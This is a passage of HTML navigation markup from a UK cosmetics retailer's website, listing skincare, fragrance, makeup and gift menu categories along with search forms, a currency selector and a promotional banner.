  812. <i class="menu-item-toggle fa fa-angle-right"></i>
  813. </a>
  814. <div class="level-2">
  815. <div class="level-2-syncwdth no-filter">
  816. <ul class="menu-vertical">
  817. <li class>
  818. <a href="index-82.html">
  819. <div class="auto-sub-category">
  820. <span>Skincare Gifts</span>
  821. </div>
  822. </a>
  823. </li>
  824. <li class>
  825. <a href="index-83.html">
  826. <div class="auto-sub-category">
  827. <span>Makeup Gifts</span>
  828. </div>
  829. </a>
  830. </li>
  831. <li class>
  832. <a href="index-84.html">
  833. <div class="auto-sub-category">
  834. <span>Bath & Body Gifts</span>
  835. </div>
  836. </a>
  837. </li>
  838. <li class>
  839. <a href="index-85.html">
  840. <div class="auto-sub-category">
  841. <span>£50 & Under Gifts</span>
  842. </div>
  843. </a>
  844. </li>
  845. <li class>
  846. <a href="index-86.html">
  847. <div class="auto-sub-category">
  848. <span>£50-£100 Gifts</span>
  849. </div>
  850. </a>
  851. </li>
  852. <li class>
  853. <a href="index-87.html">
  854. <div class="auto-sub-category">
  855. <span>£100 & Over Gifts</span>
  856. </div>
  857. </a>
  858. </li>
  859. <li class>
  860. <a href="index-88.html">
  861. <div class="auto-sub-category">
  862. <span>Online Only Gifts</span>
  863. </div>
  864. </a>
  865. </li>
  866. <li class>
  867. <a href="index-89.html">
  868. <div class="auto-sub-category">
  869. <span>Stocking Fillers</span>
  870. </div>
  871. </a>
  872. </li>
  873. <li class>
  874. <a href="index-90.html">
  875. <div class="auto-sub-category">
  876. <span>View All Gifts</span>
  877. </div>
  878. </a>
  879. </li>
  880. <li class>
  881. <a href="index-91.html">
  882. <div class="auto-sub-category">
  883. <span>Gift Guide</span>
  884. </div>
  885. </a>
  886. </li>
  887. </ul>
  888. <div class="subcat_menubox" id="subcat_gifts">
  889. <div class="subcat_menuinner">
  890. </div>
  891. </div>
  892. </div>
  893. <div class="banner"></div>
  894. </div>
  895. <li class="topmore" tabindex="0" aria-haspopup="true" aria-expanded="false" aria-label="Press Down Arrow to Expand More Links"><span>MORE<i class="fa fa-sort-desc" aria-hidden="true"></i></span>
  896. <ul class="topmoresub">
  897. <li><a class href="index-92.html"><span>CERAMIDE</span></a></li>
  898. <li><a class href="index-93.html"><span>EIGHT HOUR®</span></a></li>
  899. <li><a class href="index-94.html"><span>SPECIAL OFFERS</span></a></li>
  900. <li><a class href="index-95.html"><span>SALE</span></a></li>
  901. <li><a class href="index-96.html"><span>Beauty Services</span></a></li>
  902. </ul>
  903. </li>
  904. </li>
  905. <li class="capsules top-hide">
  906. <a class="has-sub-level" aria-haspopup="true" aria-expanded="false" aria-label="CERAMIDE Link. Press Down Arrow to Expand Sub Menu Links" href="index-92.html">
  907. <span>CERAMIDE</span>
  908. <i class="menu-item-toggle fa fa-angle-right"></i>
  909. </a>
  910. <div class="level-2">
  911. <div class="level-2-syncwdth no-filter">
  912. <ul class="menu-horizontal">
  913. </ul>
  914. <div class="subcat_menubox" id="subcat_capsules">
  915. <div class="subcat_menuinner">
  916. </div>
  917. </div>
  918. </div>
  919. <div class="banner"><style type="text/css">
  920. .level-2 .banner{
  921. display:none !important;
  922. }
  923. @media screen and (min-width: 1024px){
  924. .level-2{ background-color:transparent;}
  925. }
  926. </style></div>
  927. </div>
  928. </li>
  929. <li class="eight-hour top-hide">
  930. <a class href="index-93.html">
  931. <span>EIGHT HOUR<sup>&reg;</sup></span>
  932. </a>
  933. </li>
  934. <li class="specialoffers top-hide">
  935. <a class="has-sub-level" aria-haspopup="true" aria-expanded="false" aria-label="SPECIAL OFFERS Link. Press Down Arrow to Expand Sub Menu Links" href="index-94.html">
  936. <span>SPECIAL OFFERS</span>
  937. <i class="menu-item-toggle fa fa-angle-right"></i>
  938. </a>
  939. <div class="level-2">
  940. <div class="level-2-syncwdth no-filter">
  941. <ul class="menu-horizontal">
  942. <li class>
  943. <a href="key-worker-discount.html">
  944. <div class="auto-sub-category">
  945. <span>Key Worker Discount</span>
  946. </div>
  947. </a>
  948. </li>
  949. <li class>
  950. <a href="student-discount.html">
  951. <div class="auto-sub-category">
  952. <span>Student Discount</span>
  953. </div>
  954. </a>
  955. </li>
  956. <li class>
  957. <a href="refer-a-friend.html">
  958. <div class="auto-sub-category">
  959. <span>Refer A Friend</span>
  960. </div>
  961. </a>
  962. </li>
  963. </ul>
  964. <div class="subcat_menubox" id="subcat_specialoffers">
  965. <div class="subcat_menuinner">
  966. </div>
  967. </div>
  968. </div>
  969. <div class="banner"></div>
  970. </div>
  971. </li>
  972. <li class="sale top-hide">
  973. <a class href="index-95.html">
  974. <span>SALE</span>
  975. </a>
  976. </li>
  977. <li class="facial-services top-hide">
  978. <a class href="index-96.html">
  979. <span>Beauty Services</span>
  980. </a>
  981. </li>
  982. </ul>
  983. </div>
  984.  
  985. <div class="menu-utility-user">
  986. <div class="header-checkout hide-desktop">
  987. <a href="index-97.html" title="Checkout">
  988. Checkout
  989. </a>
  990. </div>
  991. <div class="customerservice hide-desktop">
  992. <a href="index-98.html" title="Customer Service">
  993. Customer Service
  994. </a>
  995. </div>
  996. <div class="user-login ">
  997. <div class="user-login ">
  998. <ul>
  999. <li>
  1000. <a class="null" href="index-99.html" title="Sign In">Sign In</a>
  1001. /
  1002. <a class="null" href="index-100.html" title="Register">Register</a>
  1003. </li>
  1004. </ul>
  1005. </div>
  1006. </div>
  1007. <div class="headermainsearch hide-mobile hide-tablet">
  1008. <a href="javascript:void(0)" role="button" aria-pressed="false" title="Activate search dialog" aria-label="Activate search dialog" aria-expanded="false">Search</a>
  1009. </div>
  1010. </div>
  1011. <div class="navigation-banner-responsive hide-desktop">
  1012. </div>
  1013. </nav>
  1014. <div class="header-banner hide-desktop">
  1015. <div class="header-promotion">
  1016.  
  1017. <p>20% off Eight Hour®* & FREE 3-piece Gift when you spend £55+!** | Use code: HERO | <a href="index-2.html">Shop Now</a></p>
  1018. <style type="text/css">
  1019.    .plp-popup u {
  1020.        cursor: pointer;
  1021.    }
  1022.  
  1023.    #wrapper .header-banner .header-promotion p {
  1024.        font-size: 12px;
  1025.        color: #fff;
  1026.        font-weight: 400;
  1027.    }
  1028.  
  1029.    .header-banner .header-promotion a {
  1030.        text-decoration: underline;
  1031.    }
  1032.  
  1033.    @media screen and (max-width: 767px) {
  1034.        #wrapper .header-banner .header-promotion p {
  1035.            background-color: #000;
  1036.        }
  1037.    }
  1038.  
  1039.    @media screen and (max-width: 390px) {
  1040.        .hide-small-mobile {
  1041.            display: none;
  1042.        }
  1043.    }
  1044. </style>
  1045. </div>
  1046. </div>
  1047. <div class="header-search header-searchdesktop" role="dialog">
  1048. <form action="https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Search-Show" method="get" name="simpleSearch">
  1049. <fieldset>
  1050. <label class="visually-hidden" for="q">Search Catalog</label>
  1051. <input type="text" name="q" aria-label="Search" value placeholder="Search" />
  1052. <input type="hidden" name="lang" value="en_GB" />
  1053. <button type="submit" aria-label="search button"><span class="visually-hidden">Search</span></button>
  1054. </fieldset>
  1055. <button class="close-button" aria-label="Close"></button>
  1056. </form>
  1057. </div>
  1058. <div class="store-mini">
  1059. <div class="stores">
  1060. <a href="index-101.html" title="Store Locator" class="store-loc-com">
  1061. Store Locator
  1062. </a>
  1063. </div>
  1064. <span class="borderfree-content">
  1065. <div id="currency-selector-wrapper" class="currency-selector-position-right currency-selector-position-top">
  1066. <div class="currency-selector-collapsed" style="height: 25px;">
  1067. <div class="currency-selector-menu">
  1068. <span class="currency-selector-flag">
  1069. <a id="currency-selector-flag-link" href="javascript:void(0)" style>
  1070. <li class="mc-class">
  1071. <span class="currency-selector-currencies" id="currency-span" name="currency-selector-currencies" style="color: black;">
  1072. <span class="currency-converter-option">&pound;&nbsp;GBP</span>
  1073. </span>
  1074. </li>
  1075. </a>
  1076. </span>
  1077. </div>
  1078. </div>
  1079. <div class="currency-selector-expanded" style>
  1080. <div class="currency-selector-content">
  1081. <form name="currency-selector-form" id="currency-selector-form">
  1082. <div class="currency-selector-select-wrapper">
  1083. <label for="currency-selector-countries-select" id="currency-selector-countries-label" class="currency-selector-label">I'm shipping to:</label>
  1084. <select class="currency-selector-countries" id="currency-selector-countries-select" name="currency-selector-countries" style="color: black;">
  1085. <option value="GB" selected="selected" data-currency="GBP"> United Kingdom</option>
  1086. <option value="IE" data-currency="EUR"> Ireland</option>
  1087. <option data-url="https://www.elizabetharden.fr/" value="FR" data-currency="EUR"> France</option>
  1088. <option data-url="https://www.elizabetharden.com/" value="US" data-currency="USD"> United States</option>
  1089. <option data-url="https://www.elizabetharden.es/" value="ES" data-currency="EUR"> Spain</option>
  1090. <option data-url="https://www.elizabetharden.de/" value="DE" data-currency="EUR"> Germany</option>
  1091. <option data-url="https://www.elizabetharden.com/?country=MX&amp;currency=MXN" value="MX" data-currency="MXN"> Mexico</option>
  1092. <option data-url="https://www.elizabetharden.com/?country=CA&amp;currency=CAD" value="CA" data-currency="CAD"> Canada</option>
  1093. <option data-url="https://www.elizabetharden.com.au/" value="AU" data-currency="AUD"> Australia </option>
  1094. </select>
  1095. </div>
  1096. <div class="currency-selector-select-wrapper">
  1097. <label for="currency-selector-currencies-select" id="currency-selector-currencies-label" class="currency-selector-label">I'd like to see prices in:</label>
  1098. <li class="mc-class">
  1099. <select class="currency-selector-currencies" id="currency-selector-currencies-select" name="currency-selector-currencies" style="color: black;" disabled="disabled">
  1100. <option class="currency-converter-option" value="GBP" selected="selected">GBP</option>
  1101. <option class="currency-converter-option" value="EUR">EUR</option>
  1102. <option class="currency-converter-option" value="USD">USD</option>
  1103. <option class="currency-converter-option" value="CAD">CAD</option>
  1104. <option class="currency-converter-option" value="MXN">MXN</option>
  1105. <option class="currency-converter-option" value="AUD">AUD</option>
  1106. </select>
  1107. </li>
  1108. </div>
  1109. <input type="submit" id="currency-selector-btn" class="noLink" value="OK">
  1110. </form>
  1111. <div class="currency-selector-logo-wrapper">
  1112. </div>
  1113. </div>
  1114. </div>
  1115. </div>
  1116. </span>
  1117. <script>
  1118. $( "#currency-selector-flag-link" ).click(function() {
  1119. $('#currency-selector-wrapper').appendTo('.borderfree-content');
  1120. $('.currency-selector-expanded').toggle();
  1121. });
  1122. </script>
  1123. <div id="mini-cart">
  1124.  
  1125.  
  1126. <div class="mini-cart-total">
  1127. <div class="mini-cart-link mini-cart-empty">
  1128. <span class="minicart-quantity bfx-minicart-product-qty">0</span>
  1129. </div>
  1130. </div>
  1131. </div>
  1132. </div>
  1133. </div>
  1134. <div class="sidecar-menu" id="mobile-menu-outer">
  1135. <nav id="navigation" role="navigation" class="hide-desktop">
  1136. <div class="header-search header-searchmobile">
  1137. <form action="https://www.elizabetharden.co.uk/on/demandware.store/Sites-ElizabethArdenUK-Site/en_GB/Search-Show" method="get" name="simpleSearch">
  1138. <fieldset>
  1139. <label class="visually-hidden" for="q">Search Catalog</label>
  1140. <input type="text" name="q" aria-label="Search" value placeholder="Search" />
  1141. <input type="hidden" name="lang" value="en_GB" />
  1142. <button type="submit" aria-label="search button"><span class="visually-hidden">Search</span></button>
  1143. </fieldset>
  1144. <button class="close-button" aria-label="Close"></button>
  1145. </form>
  1146. </div>
  1147. <div role="toolbar">
  1148. <ul class="menu-category level-1">
  1149. <li class="skincare ">
  1150. <a class="has-sub-level" aria-haspopup="true" aria-expanded="false" aria-label="SKINCARE Link. Press Down Arrow to Expand Sub Menu Links" href="index-3.html">
  1151. <span>SKINCARE</span>
  1152. <i class="menu-item-toggle fa fa-angle-right"></i>
  1153. </a>
  1154. <div class="level-2">
  1155. <div class="level-2-syncwdth two-filter">
  1156. <ul class="menu-horizontal">
  1157. <div class="subminititle">BY CATEGORY<i class="menu-item-toggle-subcat fa fa-angle-right"></i></div>
  1158. <li class>
  1159. <a href="index-4.html">
  1160. <div class="auto-sub-category">
  1161. <span>Moisturisers</span>
  1162. <i class="menu-item-toggle fa fa-angle-right"></i>
  1163. </div>
  1164. </a>
  1165. <ul class="level-3">
  1166. <li>
  1167. <a href="index-5.html">
  1168. <span>Balms &amp; Face Oils</span>
  1169. </a>
  1170. </li>
  1171. </ul>
  1172. </li>
  1173. <li class>
  1174. <a href="index-6.html">
  1175. <div class="auto-sub-category">
  1176. <span>Serums</span>
  1177. <i class="menu-item-toggle fa fa-angle-right"></i>
  1178. </div>
  1179. </a>
  1180. <ul class="level-3">
  1181. <li>
  1182. <a href="index-7.html">
  1183. <span>Ceramide Capsules</span>
  1184. </a>
  1185. </li>
  1186. </ul>
  1187. </li>
  1188. <li class>
  1189. <a href="index-8.html">
  1190. <div class="auto-sub-category">
  1191. <span>Eye Care</span>
  1192. </div>
  1193. </a>
  1194. </li>
  1195. <li class>
  1196. <a href="index-9.html">
  1197. <div class="auto-sub-category">
  1198. <span>Cleansers & Toners</span>
  1199. </div>
  1200. </a>
  1201. </li>
  1202. <li class>
  1203. <a href="index-10.html">
  1204. <div class="auto-sub-category">
  1205. <span>Sun & Pollution Protection</span>
  1206. </div>
  1207. </a>
  1208. </li>
  1209. <li class>
  1210. <a href="index-11.html">
  1211. <div class="auto-sub-category">
  1212. <span>Masks</span>
  1213. </div>
  1214. </a>
  1215. </li>
  1216. <li class>
  1217. <a href="index-12.html">
  1218. <div class="auto-sub-category">
  1219. <span>Facial Essence</span>
  1220. </div>
  1221. </a>
  1222. </li>
  1223. <li class>
  1224. <a href="index-13.html">
  1225. <div class="auto-sub-category">
  1226. <span>Skincare Sets</span>
  1227. </div>
  1228. </a>
  1229. </li>
  1230. <li class>
  1231. <a href="index-14.html">
  1232. <div class="auto-sub-category">
  1233. <span>Body Care</span>
  1234. </div>
  1235. </a>
  1236. </li>
  1237. <li class>
  1238. <a href="index-15.html">
  1239. <div class="auto-sub-category">
  1240. <span>Lip Care</span>
  1241. </div>
  1242. </a>
  1243. </li>
  1244. <li class>
  1245. <a href="index-16.html">
  1246. <div class="auto-sub-category">
  1247. <span>View All Skincare</span>
  1248. </div>
  1249. </a>
  1250. </li>
  1251. </ul>
  1252. <div class="subcat_menubox" id="subcat_skincare">
  1253. <div class="subcat_menuinner">
  1254. <div class="subcat-filter">
  1255. <div class="subminititle">BY CONCERN<i class="menu-item-toggle-subcat fa fa-angle-right"></i></div>
  1256. <ul>
  1257. <li><a class="refineLink2" href="index-17.html" title="Anti-Ageing"><span>Anti-Ageing</span></a> </li>
  1258. <li><a class="refineLink2" href="index-18.html" title="Restore Youth"><span>Restore Youth</span></a> </li>
  1259. <li><a class="refineLink2" href="index-19.html" title="Skin Firming"><span>Skin Firming</span></a> </li>
  1260. <li><a class="refineLink2" href="index-20.html" title="Lines &amp; Wrinkles"><span>Lines &amp; Wrinkles</span></a> </li>
  1261. <li><a class="refineLink2" href="index-21.html" title="Glowing Skin"><span>Glowing Skin</span></a> </li>
  1262. <li><a class="refineLink2" href="index-22.html" title="Skin Brightening"><span>Skin Brightening</span></a> </li>
  1263. <li><a class="refineLink2" href="index-23.html" title="Sun Protection"><span>Sun Protection</span></a> </li>
  1264. <li><a class="refineLink2" href="index-24.html" title="Skin Toning"><span>Skin Toning</span></a> </li>
  1265. </ul>
  1266. </div>
  1267. <div class="subcat-filter">
  1268. <div class="subminititle">BY COLLECTION<i class="menu-item-toggle-subcat fa fa-angle-right"></i></div>
  1269. <ul>
  1270. <li><a class="refineLink2" href="index-25.html" title="Ceramide"><span>Ceramide</span></a> </li>
  1271. <li><a class="refineLink2" href="index-26.html" title="PREVAGE&reg;"><span>PREVAGE&reg;</span></a> </li>
  1272. <li><a class="refineLink2" href="index-27.html" title="SUPERSTART"><span>SUPERSTART</span></a> </li>
  1273. <li><a class="refineLink2" href="index-28.html" title="Eight Hour&reg; Cream"><span>Eight Hour&reg; Cream</span></a> </li>
  1274. <li><a class="refineLink2" href="index-29.html" title="Visible Difference"><span>Visible Difference</span></a> </li>
  1275. <li><a class="refineLink2" href="index-30.html" title="Visible Brightening"><span>Visible Brightening</span></a> </li>
  1276. <li><a class="refineLink2" href="index-31.html" title="Retinol"><span>Retinol</span></a> </li>
  1277. </ul>
  1278. </div>
  1279. </div>
  1280. </div>
  1281. </div>
  1282. <div class="banner"><style type="text/css">
  1283. .level-2 .banner{
  1284. display:none !important;
  1285. }
  1286. @media screen and (min-width: 1024px){
  1287. .level-2{ background-color:transparent;}
  1288. }
  1289. </style></div>
  1290. </div>
  1291. </li>
  1292. <li class="fragrance ">
  1293. <a class="has-sub-level" aria-haspopup="true" aria-expanded="false" aria-label="FRAGRANCE Link. Press Down Arrow to Expand Sub Menu Links" href="index-32.html">
  1294. <span>FRAGRANCE</span>
  1295. <i class="menu-item-toggle fa fa-angle-right"></i>
  1296. </a>
  1297. <div class="level-2">
  1298. <div class="level-2-syncwdth one-filter">
  1299. <ul class="menu-horizontal">
  1300. <li class>
  1301. <a href="index-33.html">
  1302. <div class="auto-sub-category">
  1303. <span>View All Fragrance</span>
  1304. <i class="menu-item-toggle fa fa-angle-right"></i>
  1305. </div>
  1306. </a>
  1307. <ul class="level-3">
  1308. <li>
  1309. <a href="index-34.html">
  1310. <span>Citrus</span>
  1311. </a>
  1312. </li>
  1313. <li>
  1314. <a href="index-35.html">
  1315. <span>Floral</span>
  1316. </a>
  1317. </li>
  1318. <li>
  1319. <a href="index-36.html">
  1320. <span>Fruity</span>
  1321. </a>
  1322. </li>
  1323. <li>
  1324. <a href="index-37.html">
  1325. <span>Spicy</span>
  1326. </a>
  1327. </li>
  1328. <li>
  1329. <a href="index-38.html">
  1330. <span>Woody</span>
  1331. </a>
  1332. </li>
  1333. </ul>
  1334. </li>
  1335. <li class>
  1336. <a href="index-39.html">
  1337. <div class="auto-sub-category">
  1338. <span>Bath & Body</span>
  1339. <i class="menu-item-toggle fa fa-angle-right"></i>
  1340. </div>
  1341. </a>
  1342. <ul class="level-3">
  1343. <li>
  1344. <a href="index-40.html">
  1345. <span>Body Lotions &amp; Creams</span>
  1346. </a>
  1347. </li>
  1348. <li>
  1349. <a href="index-41.html">
  1350. <span>Shower Gels</span>
  1351. </a>
  1352. </li>
  1353. </ul>
  1354. </li>
  1355. <li class>
  1356. <a href="index-42.html">
  1357. <div class="auto-sub-category">
  1358. <span>New Arrivals</span>
  1359. </div>
  1360. </a>
  1361. </li>
  1362. </ul>
  1363. <div class="subcat_menubox" id="subcat_fragrance">
  1364. <div class="subcat_menuinner">
  1365. <div class="subcat-filter">
  1366. <div class="subminititle">BY COLLECTION<i class="menu-item-toggle-subcat fa fa-angle-right"></i></div>
  1367. <ul>
  1368. <li><a class="refineLink2" href="index-43.html" title="My Fifth Avenue"><span>My Fifth Avenue</span></a> </li>
  1369. <li><a class="refineLink2" href="index-44.html" title="White Tea"><span>White Tea</span></a> </li>
  1370. <li><a class="refineLink2" href="index-45.html" title="5th avenue"><span>5th avenue</span></a> </li>
  1371. <li><a class="refineLink2" href="index-46.html" title="Green Tea"><span>Green Tea</span></a> </li>
  1372. <li><a class="refineLink2" href="index-47.html" title="Red Door"><span>Red Door</span></a> </li>
  1373. <li><a class="refineLink2" href="index-48.html" title="Sunflowers"><span>Sunflowers</span></a> </li>
  1374. <li><a class="refineLink2" href="index-49.html" title="Blue Grass"><span>Blue Grass</span></a> </li>
  1375. <li><a class="refineLink2" href="index-50.html" title="Mediterranean"><span>Mediterranean</span></a> </li>
  1376. <li><a class="refineLink2" href="index-51.html" title="ardenbeauty"><span>ardenbeauty</span></a> </li>
  1377. <li><a class="refineLink2" href="index-52.html" title="Splendor"><span>Splendor</span></a> </li>
  1378. </ul>
  1379. </div>
  1380. </div>
  1381. </div>
  1382. </div>
  1383. <div class="banner"></div>
  1384. </div>
  1385. </li>
  1386. <li class="makeup ">
  1387. <a class="has-sub-level" aria-haspopup="true" aria-expanded="false" aria-label="MAKEUP Link. Press Down Arrow to Expand Sub Menu Links" href="index-53.html">
  1388. <span>MAKEUP</span>
  1389. <i class="menu-item-toggle fa fa-angle-right"></i>
  1390. </a>
  1391. <div class="level-2">
  1392. <div class="level-2-syncwdth one-filter">
  1393. <ul class="menu-horizontal">
  1394. <li class>
  1395. <a href="index-54.html">
  1396. <div class="auto-sub-category">
  1397. <span>Face</span>
  1398. <i class="menu-item-toggle fa fa-angle-right"></i>
  1399. </div>
  1400. </a>
  1401. <ul class="level-3">
  1402. <li>
  1403. <a href="index-55.html">
  1404. <span>Foundation</span>
  1405. </a>
  1406. </li>
  1407. <li>
  1408. <a href="index-56.html">
  1409. <span>Primer</span>
  1410. </a>
  1411. </li>
  1412. <li>
  1413. <a href="index-57.html">
  1414. <span>Concealer</span>
  1415. </a>
  1416. </li>
  1417. <li>
  1418. <a href="index-58.html">
  1419. <span>Powder</span>
  1420. </a>
  1421. </li>
  1422. <li>
  1423. <a href="index-59.html">
  1424. <span>Blush &amp; Bronzers</span>
  1425. </a>
  1426. </li>
  1427. <li>
  1428. <a href="index-60.html">
  1429. <span>View All Face</span>
  1430. </a>
  1431. </li>
  1432. </ul>
  1433. </li>
  1434. <li class>
  1435. <a href="index-61.html">
  1436. <div class="auto-sub-category">
  1437. <span>Eyes</span>
  1438. <i class="menu-item-toggle fa fa-angle-right"></i>
  1439. </div>
  1440. </a>
  1441. <ul class="level-3">
  1442. <li>
  1443. <a href="index-62.html">
  1444. <span>Mascara</span>
  1445. </a>
  1446. </li>
  1447. <li>
  1448. <a href="index-63.html">
  1449. <span>Eyeliner</span>
  1450. </a>
  1451. </li>
  1452. <li>
  1453. <a href="index-64.html">
  1454. <span>Eye Shadow Primer</span>
  1455. </a>
  1456. </li>
  1457. <li>
  1458. <a href="index-65.html">
  1459. <span>Eyebrow</span>
  1460. </a>
  1461. </li>
  1462. <li>
  1463. <a href="index-66.html">
  1464. <span>View All Eyes</span>
  1465. </a>
  1466. </li>
  1467. </ul>
  1468. </li>
  1469. <li class>
  1470. <a href="index-67.html">
  1471. <div class="auto-sub-category">
  1472. <span>Lips</span>
  1473. <i class="menu-item-toggle fa fa-angle-right"></i>
  1474. </div>
  1475. </a>
  1476. <ul class="level-3">
  1477. <li>
  1478. <a href="index-68.html">
  1479. <span>Lipstick</span>
  1480. </a>
  1481. </li>
  1482. <li>
  1483. <a href="index-69.html">
  1484. <span>Lipgloss</span>
  1485. </a>
  1486. </li>
  1487. <li>
  1488. <a href="index-70.html">
  1489. <span>Lip Liner &amp; Pencils</span>
  1490. </a>
  1491. </li>
  1492. <li>
  1493. <a href="index-71.html">
  1494. <span>Lip Balm &amp; Treatment</span>
  1495. </a>
  1496. </li>
  1497. <li>
  1498. <a href="index-72.html">
  1499. <span>View All Lips</span>
  1500. </a>
  1501. </li>
  1502. </ul>
  1503. </li>
  1504. <li class>
  1505. <a href="index-73.html">
  1506. <div class="auto-sub-category">
  1507. <span>New Arrivals</span>
  1508. </div>
  1509. </a>
  1510. </li>
  1511. <li class>
  1512. <a href="index-74.html">
  1513. <div class="auto-sub-category">
  1514. <span>Makeup Sets</span>
  1515. </div>
  1516. </a>
  1517. </li>
  1518. </ul>
  1519. <div class="subcat_menubox" id="subcat_makeup">
  1520. <div class="subcat_menuinner">
  1521. <div class="subcat-filter">
  1522. <div class="subminititle">BY COLLECTION<i class="menu-item-toggle-subcat fa fa-angle-right"></i></div>
  1523. <ul>
  1524. <li><a class="refineLink2" href="index-75.html" title="Flawless Finish"><span>Flawless Finish</span></a> </li>
  1525. <li><a class="refineLink2" href="index-76.html" title="Beautiful Color"><span>Beautiful Color</span></a> </li>
  1526. <li><a class="refineLink2" href="index-77.html" title="Liquid Assets"><span>Liquid Assets</span></a> </li>
  1527. <li><a class="refineLink2" href="index-78.html" title="Gelato Crush"><span>Gelato Crush</span></a> </li>
  1528. <li><a class="refineLink2" href="index-79.html" title="Drama Defined"><span>Drama Defined</span></a> </li>
  1529. </ul>
  1530. </div>
  1531. </div>
  1532. </div>
  1533. </div>
  1534. <div class="banner"></div>
  1535. </div>
  1536. </li>
  1537. <li class="best sellers ">
  1538. <a class="has-sub-level" aria-haspopup="true" aria-expanded="false" aria-label="BESTSELLERS Link. Press Down Arrow to Expand Sub Menu Links" href="index-80.html">
  1539. <span>BESTSELLERS</span>
  1540. <i class="menu-item-toggle fa fa-angle-right"></i>
  1541. </a>
  1542. <div class="level-2">
  1543. <div class="level-2-syncwdth no-filter">
  1544. <ul class="menu-horizontal">
  1545. </ul>
  1546. <div class="subcat_menubox" id="subcat_best sellers">
  1547. <div class="subcat_menuinner">
  1548. </div>
  1549. </div>
  1550. </div>
  1551. <div class="banner"><style type="text/css">
  1552. .level-2 .banner{
  1553. display:none !important;
  1554. }
  1555. @media screen and (min-width: 1024px){
  1556. .level-2{ background-color:transparent;}
  1557. }
  1558. </style></div>
  1559. </div>
  1560. </li>
  1561. <li class="gifts ">
  1562. <a class="has-sub-level" aria-haspopup="true" aria-expanded="false" aria-label="GIFTS Link. Press Down Arrow to Expand Sub Menu Links" href="index-81.html">
  1563. <span>GIFTS</span>
  1564. <i class="menu-item-toggle fa fa-angle-right"></i>
  1565. </a>
  1566. <div class="level-2">
  1567. <div class="level-2-syncwdth no-filter">
  1568. <ul class="menu-vertical">
  1569. <li class>
  1570. <a href="index-82.html">
  1571. <div class="auto-sub-category">
  1572. <span>Skincare Gifts</span>
  1573. </div>
  1574. </a>
  1575. </li>
  1576. <li class>
  1577. <a href="index-83.html">
  1578. <div class="auto-sub-category">
  1579. <span>Makeup Gifts</span>
  1580. </div>
  1581. </a>
  1582. </li>
  1583. <li class>
  1584. <a href="index-84.html">
  1585. <div class="auto-sub-category">
  1586. <span>Bath & Body Gifts</span>
  1587. </div>
  1588. </a>
  1589. </li>
  1590. <li class>
  1591. <a href="index-85.html">
  1592. <div class="auto-sub-category">
  1593. <span>£50 & Under Gifts</span>
  1594. </div>
  1595. </a>
  1596. </li>
  1597. <li class>
  1598. <a href="index-86.html">
  1599. <div class="auto-sub-category">
  1600. <span>£50-£100 Gifts</span>
  1601. </div>
  1602. </a>
  1603. </li>
  1604. <li class>
  1605. <a href="index-87.html">
  1606. <div class="auto-sub-category">
  1607. <span>£100 & Over Gifts</span>
  1608. </div>
  1609. </a>
  1610. </li>
  1611. <li class>
  1612. <a href="index-88.html">
  1613. <div class="auto-sub-category">
  1614. <span>Online Only Gifts</span>
  1615. </div>
  1616. </a>
  1617. </li>
  1618. <li class>
  1619. <a href="index-89.html">
  1620. <div class="auto-sub-category">
  1621. <span>Stocking Fillers</span>
  1622. </div>
  1623. </a>
  1624. </li>
  1625. <li class>
  1626. <a href="index-90.html">
  1627. <div class="auto-sub-category">
  1628. <span>View All Gifts</span>
  1629. </div>
  1630. </a>
  1631. </li>
  1632. <li class>
  1633. <a href="index-91.html">
  1634. <div class="auto-sub-category">
  1635. <span>Gift Guide</span>
  1636. </div>
  1637. </a>
  1638. </li>
  1639. </ul>
  1640. <div class="subcat_menubox" id="subcat_gifts">
  1641. <div class="subcat_menuinner">
  1642. </div>
  1643. </div>
  1644. </div>
  1645. <div class="banner"></div>
  1646. </div>
  1647. <li class="topmore" tabindex="0" aria-haspopup="true" aria-expanded="false" aria-label="Press Down Arrow to Expand More Links"><span>MORE<i class="fa fa-sort-desc" aria-hidden="true"></i></span>
  1648. <ul class="topmoresub">
  1649. <li><a class href="index-92.html"><span>CERAMIDE</span></a></li>
  1650. <li><a class href="index-93.html"><span>EIGHT HOUR®</span></a></li>
  1651. <li><a class href="index-94.html"><span>SPECIAL OFFERS</span></a></li>
  1652. <li><a class href="index-95.html"><span>SALE</span></a></li>
  1653. <li><a class href="index-96.html"><span>Beauty Services</span></a></li>
  1654. </ul>
  1655. </li>
  1656. </li>
  1657. <li class="capsules top-hide">
  1658. <a class="has-sub-level" aria-haspopup="true" aria-expanded="false" aria-label="CERAMIDE Link. Press Down Arrow to Expand Sub Menu Links" href="index-92.html">
  1659. <span>CERAMIDE</span>
  1660. <i class="menu-item-toggle fa fa-angle-right"></i>
  1661. </a>
  1662. <div class="level-2">
  1663. <div class="level-2-syncwdth no-filter">
  1664. <ul class="menu-horizontal">
  1665. </ul>
  1666. <div class="subcat_menubox" id="subcat_capsules">
  1667. <div class="subcat_menuinner">
  1668. </div>
  1669. </div>
  1670. </div>
  1671. <div class="banner"><style type="text/css">
  1672. .level-2 .banner{
  1673. display:none !important;
  1674. }
  1675. @media screen and (min-width: 1024px){
  1676. .level-2{ background-color:transparent;}
  1677. }
  1678. </style></div>
  1679. </div>
  1680. </li>
  1681. <li class="eight-hour top-hide">
  1682. <a class href="index-93.html">
  1683. <span>EIGHT HOUR<sup>&reg;</sup></span>
  1684. </a>
  1685. </li>
  1686. <li class="specialoffers top-hide">
  1687. <a class="has-sub-level" aria-haspopup="true" aria-expanded="false" aria-label="SPECIAL OFFERS Link. Press Down Arrow to Expand Sub Menu Links" href="index-94.html">
  1688. <span>SPECIAL OFFERS</span>
  1689. <i class="menu-item-toggle fa fa-angle-right"></i>
  1690. </a>
  1691. <div class="level-2">
  1692. <div class="level-2-syncwdth no-filter">
  1693. <ul class="menu-horizontal">
  1694. <li class>
  1695. <a href="key-worker-discount.html">
  1696. <div class="auto-sub-category">
  1697. <span>Key Worker Discount</span>
  1698. </div>
  1699. </a>
  1700. </li>
  1701. <li class>
  1702. <a href="student-discount.html">
  1703. <div class="auto-sub-category">
  1704. <span>Student Discount</span>
  1705. </div>
  1706. </a>
  1707. </li>
  1708. <li class>
  1709. <a href="refer-a-friend.html">
  1710. <div class="auto-sub-category">
  1711. <span>Refer A Friend</span>
  1712. </div>
  1713. </a>
  1714. </li>
  1715. </ul>
  1716. <div class="subcat_menubox" id="subcat_specialoffers">
  1717. <div class="subcat_menuinner">
  1718. </div>
  1719. </div>
  1720. </div>
  1721. <div class="banner"></div>
  1722. </div>
  1723. </li>
  1724. <li class="sale top-hide">
  1725. <a class href="index-95.html">
